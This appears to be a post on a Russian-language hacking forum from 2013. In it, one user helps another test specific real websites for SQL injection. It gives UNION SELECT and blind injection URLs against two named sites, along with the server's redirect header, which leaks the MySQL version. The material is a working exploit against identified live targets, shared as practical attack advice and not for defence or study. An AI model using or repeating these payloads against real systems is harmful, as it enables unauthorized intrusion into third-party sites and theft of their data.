Показать сообщение отдельно

  #22849  
Старый 10.10.2013, 15:06
YaBtr
Постоянный
Регистрация: 30.05.2012
Сообщений: 600
С нами: 7343606

Репутация: 652


По умолчанию

Цитата:
Сообщение от Unknowhacker  
Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
Код:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
www.mebi.us/out.php?id=5+and+mid(version(),1,1)=5

upd

Второй случай более интересен:

www.sport-trade.ru/out.php?id=-9'+union+select+1,2,3,4,5,6,7,8,9,version(),11+--+

Смотрим заголовок ответа сервера:

HTTP/1.1 302 Moved Temporarily

Servernginx/1.1.5

DateThu,10 Oct 2013 10:31:04 GMT

Content-Type text/ng

Transfer-Encoding chunked

Connectionkeep-alive

X-Powered-By PHP/5.2.17

location/out.php?id=5.1.70-cll

Ну или смотри адресную строку.
 
Ответить с цитированием